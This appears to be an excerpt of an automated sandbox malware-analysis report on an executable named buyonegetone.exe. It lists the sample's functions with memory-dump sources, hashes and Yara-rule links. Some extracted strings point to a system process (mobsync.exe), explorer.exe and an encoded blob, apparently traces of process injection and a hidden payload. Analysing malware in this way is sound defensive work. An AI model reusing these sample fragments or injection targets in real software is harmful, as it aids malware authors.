                                                                                                                                                                      Function 00007FFAEEBE0A5C, Relevance: 1.3, Strings: 1, Instructions: 71COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: g*M
                                                                                                                                                                      • API String ID: 0-29437398
                                                                                                                                                                      • Opcode ID: 61767ce0928d459ca1037aca62f8acaa319e7843340e43f7089ebb1de396dd48
                                                                                                                                                                      • Instruction ID: 7ceec0cb556263c3b735bf3a0f8a18b99292ced1c3dae5af3f59c4e58f12c2f2
                                                                                                                                                                      • Opcode Fuzzy Hash: 61767ce0928d459ca1037aca62f8acaa319e7843340e43f7089ebb1de396dd48
                                                                                                                                                                      • Instruction Fuzzy Hash: 99113873E0DE4F0BF2A563696865274B9C0EF46620B0AC1FAD04DE71D6DC485C0402C3
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE6B33, Relevance: .2, Instructions: 180COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: e68d054aaa274fc71bc7d45d83ad77363c074cd91d7de9234d9d934f969e3b7e
                                                                                                                                                                      • Instruction ID: 05e6b228c10da2fc3654ddbbc1ced66c8c23408ada43943d97bbc55b39e3fba1
                                                                                                                                                                      • Opcode Fuzzy Hash: e68d054aaa274fc71bc7d45d83ad77363c074cd91d7de9234d9d934f969e3b7e
                                                                                                                                                                      • Instruction Fuzzy Hash: 9B511E72A0CA4A0FE7A9DB2DE49237477D1EF85321B5981BEC14EC72A7DD14EC054386
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB17DA5, Relevance: .1, Instructions: 136COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 66cc79a8ee51898509c8ab36238a880079129b51da383640a63726818cce3fdd
                                                                                                                                                                      • Instruction ID: f226b7d1a53d72806e043199198ce38d9239ed70116774064eb5771c4d5a4f78
                                                                                                                                                                      • Opcode Fuzzy Hash: 66cc79a8ee51898509c8ab36238a880079129b51da383640a63726818cce3fdd
                                                                                                                                                                      • Instruction Fuzzy Hash: F831F67191CB4C8FDB18AB5CD8466F97BE0FB5A720F00426FE449C3252DA74A8568BC2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB186CC, Relevance: .1, Instructions: 102COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 1f11b8499e512d2937a99bea6dd277a92a2039bf7e72aaa423bb9e8911edaff5
                                                                                                                                                                      • Instruction ID: 2139caaf1976ded07fca23b606670ce0cc9b4ef938b833844a1721b0fd62fe9c
                                                                                                                                                                      • Opcode Fuzzy Hash: 1f11b8499e512d2937a99bea6dd277a92a2039bf7e72aaa423bb9e8911edaff5
                                                                                                                                                                      • Instruction Fuzzy Hash: F421E63090C74C4FEB59DFACD84A7E97FE0EB96321F04816BD048C3156DA74945ACB92
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE6B7F, Relevance: .1, Instructions: 93COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0993bab8ad592b308b72664e24c42b1c3da95f8d71dc113e0a44f2f9190db939
                                                                                                                                                                      • Instruction ID: 739ac123e15ca08138e8b0b88b32ea51f2d6982a93891f295747ac15bdcb8f3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 0993bab8ad592b308b72664e24c42b1c3da95f8d71dc113e0a44f2f9190db939
                                                                                                                                                                      • Instruction Fuzzy Hash: C121EB7290DA4B4FE7A8D729E4D237476D5EF45311B5A80B9D04EC72ABDD18EC054242
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEBE231B, Relevance: .1, Instructions: 89COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300861725.00007FFAEEBE0000.00000040.00000001.sdmp, Offset: 00007FFAEEBE0000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 774d720edf62b2847b143451f325dcfd5a1a94564fcc352d420446742c65016c
                                                                                                                                                                      • Instruction ID: 08b7002f31c0cadca3c97316146e69fd19c706c0ac2c2804b0d8a0b4e33e4586
                                                                                                                                                                      • Opcode Fuzzy Hash: 774d720edf62b2847b143451f325dcfd5a1a94564fcc352d420446742c65016c
                                                                                                                                                                      • Instruction Fuzzy Hash: E7212661A4EB8A0FE759EB7CAC921747BC1EF5622075440FED04EC72E3CC09AC098742
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB130B5, Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 3fdb3d00a115e486d76670ef061dad5bc6281eee87bb8619dd2d23702bb9a4f4
                                                                                                                                                                      • Instruction ID: ed38db82d638ca2be722a81b3691aebcb7e11f3393a4ad01927a8b83955cab81
                                                                                                                                                                      • Opcode Fuzzy Hash: 3fdb3d00a115e486d76670ef061dad5bc6281eee87bb8619dd2d23702bb9a4f4
                                                                                                                                                                      • Instruction Fuzzy Hash: 4001677111CB0D8FDB44EF0CE491AA6B7E0FB95324F10056EE58AC3651DA36E882CB46
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB12CFA, Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0c8810024e4af480a083d2fe61e41b1d8a9f5e6816d9252a5339f6589b4756a0
                                                                                                                                                                      • Instruction ID: 7d2bfdf7f0e1e10868d3796baabe95b23c23115a1289289c9039cb5a35b04ac9
                                                                                                                                                                      • Opcode Fuzzy Hash: 0c8810024e4af480a083d2fe61e41b1d8a9f5e6816d9252a5339f6589b4756a0
                                                                                                                                                                      • Instruction Fuzzy Hash: 01F05220A0CA890FE78AF33CC4A8AA07FD1EF9E26070A41E7C00CCB257D958D844C382
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB118B8, Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 717c9ff8582322eebd10bd171a6c38ee24b1203720702e6c7f199863d304c7f4
                                                                                                                                                                      • Instruction ID: ba772a264b0227205668d878b0a63677fc3b093623b9f7fe697bc06979844dbe
                                                                                                                                                                      • Opcode Fuzzy Hash: 717c9ff8582322eebd10bd171a6c38ee24b1203720702e6c7f199863d304c7f4
                                                                                                                                                                      • Instruction Fuzzy Hash: BEF0303275C6044FDB4CAA1CF8429B5B3D1EB99320B00416EF48BC2696D927E8428A86
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB11874, Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 0d73b094f9b4e20837e75eafbcb31c8d1b4e74f103a5b7c92f5cf9b3bc6007af
                                                                                                                                                                      • Instruction ID: e930060029953a390b40b94d53b4c41f9afed659a293dafec8793e1a3ee97e4a
                                                                                                                                                                      • Opcode Fuzzy Hash: 0d73b094f9b4e20837e75eafbcb31c8d1b4e74f103a5b7c92f5cf9b3bc6007af
                                                                                                                                                                      • Instruction Fuzzy Hash: 88F0303275C6044FDB4CAA1CF8429B5B3D1E799324B00016EE48BC2656D926E8438A85
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB18328, Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 480973e80ee74dee2b71f11aa8fdd2b8fbe3c49a145209bbddfd1737db06c102
                                                                                                                                                                      • Instruction ID: d4549ef085477bfbd6c2e0f7d817d3d185a6aad4fb65326e00ffc4633ad13c36
                                                                                                                                                                      • Opcode Fuzzy Hash: 480973e80ee74dee2b71f11aa8fdd2b8fbe3c49a145209bbddfd1737db06c102
                                                                                                                                                                      • Instruction Fuzzy Hash: BEF02B3180C6894FDB06DF6498595D57FA0FF16310F0942DBE44CC70A2DB649558C782
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB12920, Relevance: .0, Instructions: 24COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 11a0e7faec8f03330d6f1e9564aac612fdacc6e931a0608201264916d93b2d2a
                                                                                                                                                                      • Instruction ID: 4c20a6fbaba1d69c61e1ca03ded5042232274d5fc5a30ece9000834711698493
                                                                                                                                                                      • Opcode Fuzzy Hash: 11a0e7faec8f03330d6f1e9564aac612fdacc6e931a0608201264916d93b2d2a
                                                                                                                                                                      • Instruction Fuzzy Hash: EEE08C31810A0C8F8B44EF18D8099EAB7E0FB29305B01429BF80ED3120DB31AA58CBC2
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 00007FFAEEB110AB, Relevance: .3, Instructions: 265COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 7f13253863c4f7da6d6c33fc96212e266d7d6ffa043c8c4c3286cd02c1ea2e69
                                                                                                                                                                      • Instruction ID: 151301d7b8b0fbd5ebab055567af4d7a202cd381e18e92047b275886050294ab
                                                                                                                                                                      • Opcode Fuzzy Hash: 7f13253863c4f7da6d6c33fc96212e266d7d6ffa043c8c4c3286cd02c1ea2e69
                                                                                                                                                                      • Instruction Fuzzy Hash: E271F576A0DBC24FE346E76E94D52E57FA0EF6717474A80B7D08CC7053E8595C0A8392
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB10FC2, Relevance: .1, Instructions: 123COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 2cd6d828d0cfc6926e4eb27997b9466e668bd423552abee6f62e79a91dc0b2a8
                                                                                                                                                                      • Instruction ID: c42725d1d7d783a5eb3089300a5773edc3e0029e888612b6927bc61b956d84bb
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cd6d828d0cfc6926e4eb27997b9466e668bd423552abee6f62e79a91dc0b2a8
                                                                                                                                                                      • Instruction Fuzzy Hash: 753116B7D0D7D39BE202672DD4E61F57FA0EF1357870A81BBD0889A093E9586C4F8182
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB17835, Relevance: 7.6, Strings: 6, Instructions: 130COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: @&$P&$`&$h'$p&$x'
                                                                                                                                                                      • API String ID: 0-389033552
                                                                                                                                                                      • Opcode ID: 14323c226d845bb1b7578d4daea33efcf9125ae0e8c4bcd522414401a17c7e16
                                                                                                                                                                      • Instruction ID: 5cc1d69d4cfdccb4196aa699edb58d1f3239eecbafa21e595ef4ec31256ca0a6
                                                                                                                                                                      • Opcode Fuzzy Hash: 14323c226d845bb1b7578d4daea33efcf9125ae0e8c4bcd522414401a17c7e16
                                                                                                                                                                      • Instruction Fuzzy Hash: 6631BCA3A4E7D14FE217429EAC562686FB0EFC7630B1981FBD04C872DBA4444D0E8392
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFAEEB14650, Relevance: 6.3, Strings: 5, Instructions: 38COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.300740723.00007FFAEEB10000.00000040.00000001.sdmp, Offset: 00007FFAEEB10000, based on PE: false
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: (e$8e$He$Xe$he
                                                                                                                                                                      • API String ID: 0-740755560
                                                                                                                                                                      • Opcode ID: 6964da54da29914a69245a656d0915f3334a671470820fd4ba435a6c0266311f
                                                                                                                                                                      • Instruction ID: 3c735e563d9e1854a37dbcf9cf5e55e4d36d25ec6e657020d82e16c37ed00214
                                                                                                                                                                      • Opcode Fuzzy Hash: 6964da54da29914a69245a656d0915f3334a671470820fd4ba435a6c0266311f
                                                                                                                                                                      • Instruction Fuzzy Hash: 50F012D7A0DAC34BE15542CDBC1A2691EA197D366571981FBD04C4F2DF4884990E82C5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Analysis Process: buyonegetone.exe PID: 6748 Parent PID: 5720 buyonegetone.exeCOMMON

                                                                                                                                                                      Executed Functions

                                                                                                                                                                      Function 00007FF686047CB8, Relevance: 3.0, APIs: 2, Instructions: 18COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExceptionFilterUnhandled_invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 59578552-0
                                                                                                                                                                      • Opcode ID: aefbb748aab3b2ed0b365a73ca61f2edd74d538c1ee05200e2ccf493cb30d1d2
                                                                                                                                                                      • Instruction ID: 558781a6e8bc78040e467c57bff52ee9d3ebf1e76643fd03e7dfd4298c021672
                                                                                                                                                                      • Opcode Fuzzy Hash: aefbb748aab3b2ed0b365a73ca61f2edd74d538c1ee05200e2ccf493cb30d1d2
                                                                                                                                                                      • Instruction Fuzzy Hash: 31E04F20E5C143C1E92837650B470BC10807F15320F60123ED11DE93D2CC5E6D42EA6A
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686043190, Relevance: 26.6, APIs: 10, Strings: 5, Instructions: 341COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • @, xrefs: 00007FF686043096
                                                                                                                                                                      • C:\Windows\System32\mobsync.exe, xrefs: 00007FF68604303C
                                                                                                                                                                      • FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj, xrefs: 00007FF686043240
                                                                                                                                                                      • explorer.exe, xrefs: 00007FF686042F76
                                                                                                                                                                      • R]7, xrefs: 00007FF6860433CB
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Window$Concurrency::cancel_current_taskConsoleMitigationPolicyProcessShow
                                                                                                                                                                      • String ID: @$C:\Windows\System32\mobsync.exe$FBtx+cQ0wBf1QaR/F3NyW2buPGRwuoe8XWPJF+s/XkGNNyrUqBweCIM5LbxzHXsAWbL2LktkJjnllVbj6BGrqrqYneuqzN3tjTEBSUZlWEfQHxmm0HfxZ4W7xd7Etp7tjxqdtXY+9v/AmBnr+JWYRqKSraPDrzg/TJgshMz+ZokplO4ccfvRwhMziznOglinvB1lUmTLGC79cHnwg2VgF+aqLvG92DRJirkU5ivdR4L9Y6Gu44KypBugLL1iski5Vtdj$R]7$explorer.exe
                                                                                                                                                                      • API String ID: 4262344479-4185684469
                                                                                                                                                                      • Opcode ID: 2f741b4824dab41d693de1b8c45345d79467febea3363ccd6810bb77f6bfe84b
                                                                                                                                                                      • Instruction ID: cb9bdbbdc1ccb2c5886d3fdf7a47059c1710dda198bf958aa2789d5c7561246e
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f741b4824dab41d693de1b8c45345d79467febea3363ccd6810bb77f6bfe84b
                                                                                                                                                                      • Instruction Fuzzy Hash: 69E1FF22A18B82C5EB348F25D6443AD6761FF54798F105239DAAC47BD9CFBEE880C744
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686047CD4, Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: __scrt_acquire_startup_lock__scrt_initialize_crt__scrt_is_managed_app__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3638128798-0
                                                                                                                                                                      • Opcode ID: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction ID: c592dfb2a2f40a77f22fbc360e4c6a98ad473ce41e2fe1065e39f000a202b141
                                                                                                                                                                      • Opcode Fuzzy Hash: 49bdca32bcec916e7f7748a8719e7af450ff2d19f91812179d5dd9a257b79687
                                                                                                                                                                      • Instruction Fuzzy Hash: 26314C21A0C243C1EA34AB2196563B922A1BF65788F44453DE70E9B2D3DEAFEC44C25D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686052060, Relevance: 4.5, APIs: 3, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction ID: a294f08226ab93d877ae2b68076fb289926e166219b6c269a56d17bc72ff3252
                                                                                                                                                                      • Opcode Fuzzy Hash: 4a5a4178b89e75a6764050cf1db7e4da5d1539da0e5c1199342dfec5e059194f
                                                                                                                                                                      • Instruction Fuzzy Hash: 01E01220A44301C2F65457309E993792252BF84701F00543DC50E83353CD3FAC89C206
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605EC00, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 19COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: try_get_function
                                                                                                                                                                      • String ID: AppPolicyGetProcessTerminationMethod
                                                                                                                                                                      • API String ID: 2742660187-2031265017
                                                                                                                                                                      • Opcode ID: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction ID: e5ff2f45f3bdff043eaa3d8ebff4365d48d3c011f4409e6836b8f2cf5881990a
                                                                                                                                                                      • Opcode Fuzzy Hash: e6b2794a858986ddbfee4fa39289e9d0355e1d80311a3fc734e7953c29080ccc
                                                                                                                                                                      • Instruction Fuzzy Hash: 53E08691F08946D1FE0847A1BA192B01321BF18370E484339EB3C863D0DE2EBDD6C308
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF68605C1B4, Relevance: 3.1, APIs: 2, Instructions: 73COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                      • Opcode ID: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction ID: 087c772a8b8a1d5897dd25b521c0097bbc084c2524971bf07cfd1527718aad4d
                                                                                                                                                                      • Opcode Fuzzy Hash: f0ddef62cf4af00b7afe36782bcc538dcc0aa40ad8084fc7657064176c5912d5
                                                                                                                                                                      • Instruction Fuzzy Hash: 9E318521A18B46C1D7648B5496942782690FF45BB0F64133DDB6E973E0CF3AEC91D309
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF686047BF0, Relevance: 3.1, APIs: 2, Instructions: 55COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 0000000D.00000002.267325262.00007FF686041000.00000020.00020000.sdmp, Offset: 00007FF686040000, based on PE: true
                                                                                                                                                                      • Associated: 0000000D.00000002.267319649.00007FF686040000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267351690.00007FF68606C000.00000002.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267394960.00007FF686080000.00000004.00020000.sdmp Download File
                                                                                                                                                                      • Associated: 0000000D.00000002.267403246.00007FF686084000.00000002.00020000.sdmp Download File
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize_invalid_parameter_noinfo_set_fmode
